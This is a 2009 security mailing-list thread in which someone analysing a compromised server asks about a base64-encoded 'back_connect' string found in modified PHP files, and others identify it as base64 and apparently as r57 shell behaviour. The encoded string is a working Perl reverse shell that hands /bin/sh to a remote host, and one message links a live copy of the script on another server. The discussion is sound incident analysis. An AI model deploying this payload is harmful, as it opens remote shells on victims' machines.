[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] connect back PHP hack

Just as an FYI:

Webscarab and Paros (web application proxies) both have a good Base64
decoder built-in.

This is useful for any sniffed requested using basic authentication as
well.

--Justin

 
On Tue, 2009-02-10 at 14:34 -0500, sr. wrote:
> i really appreciate all of the responses. this is what community is all about.
> 
> i'd seen the "==" in other encoding schemes, but just wasn't sure and
> wanted a quick response...thanks to everyone who responded!
> 
> I'll post the rest of my findings on here asap. i'm looking into an
> old compromised machine. this is nothing new..
> 
> whoever mentioned the r57 shell, you're probably right as the script
> connects to a remote box @ port 11457. this is r57 behaviour.
> 
> i also found a copy of the same script i'm dissecting on someone
> else's box, you can check it out here:
> http://www.menola.org/~matjaz/images/info/o_meni/config.inc.php
> 
> in my case, a bunch of php files were modified. i'll zip everything up
> and host it so you can all analyze...
> 
> thx,
> 
> sr. aka "fabrizio siciliano"
> 
> 
> 
> 
> 
> On Tue, Feb 10, 2009 at 2:10 PM, Gustavo Castro <gcastrop@xxxxxxxxx> wrote:
> > "Sr."
> >
> >  This is base64 encoded.
> >
> > 2009/2/10 sr. <staticrez@xxxxxxxxx>:
> >> can anyone tell me what encoding this is?
> >>
> >> $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
> >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
> >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
> >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
> >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
> >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
> >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
> >>
> >> this has to do with old php 4.x.x version with magic quotes enabled.
> >> i'm just trying to figure out what the connect back code does.
> >>
> >> any input is much appreciated.
> >>
> >> thx,
> >>
> >> sr.
> >
> > --
> > Saludos,
> >     Gustavo Castro Puig.
> >     E-Mail: gcastrop@xxxxxxxxx
> >
> > LPI Level-1 Certified (https://www.lpi.org/es/verify.html
> > LPID:LPI000042304 Verification Code: hp6re8w5qg )
> > -----BEGIN GEEK CODE BLOCK-----
> > Version: 3.12
> > GCS/CM/IT/ED dx s-:- a? C(+++)$ UL++++*$ P+ L++++(++)$ E--- W+++$ N+ o?
> > K- w O M V-- PS PE++(-) Y-(+) PGP+ t(++) 5+ X++ R tv+ b++(++++) DI+++
> > D++ G++ e++ h--- r y+++
> > ------END GEEK CODE BLOCK------
> > Registered Linux User #69342
> >
> 
> 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/